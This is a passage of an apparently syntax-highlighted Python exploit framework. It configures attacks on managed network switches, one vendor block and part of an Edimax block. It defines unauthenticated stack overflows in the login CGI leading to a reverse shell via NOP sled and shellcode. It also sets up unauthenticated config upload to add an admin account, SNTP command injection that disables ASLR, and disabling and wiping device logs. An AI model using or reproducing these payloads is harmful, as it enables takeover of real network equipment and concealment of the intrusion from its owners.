				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;ram_sev_0=on&amp;ram_sev_1=on&amp;ram_sev_2=on&amp;ram_sev_3=on&amp;ram_sev_4=on&amp;ram_sev_5=on&amp;ram_sev_6=on&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_fileClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_ramClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=aaa_userDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment">#</span>
						<span class="token comment"># Most probably it is vulnerable</span>
						<span class="token comment">#</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>	<span class="token comment"># Not vulnerable </span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>					<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=+&amp;cursntpPort=139'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>

						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x00</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Edimax'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'EDIMAX Technology Co., Ltd.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;empty=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_global'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_clear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;target=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_saverun_cfg'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_uploadfail'</span><span class="token punctuation">,</span>
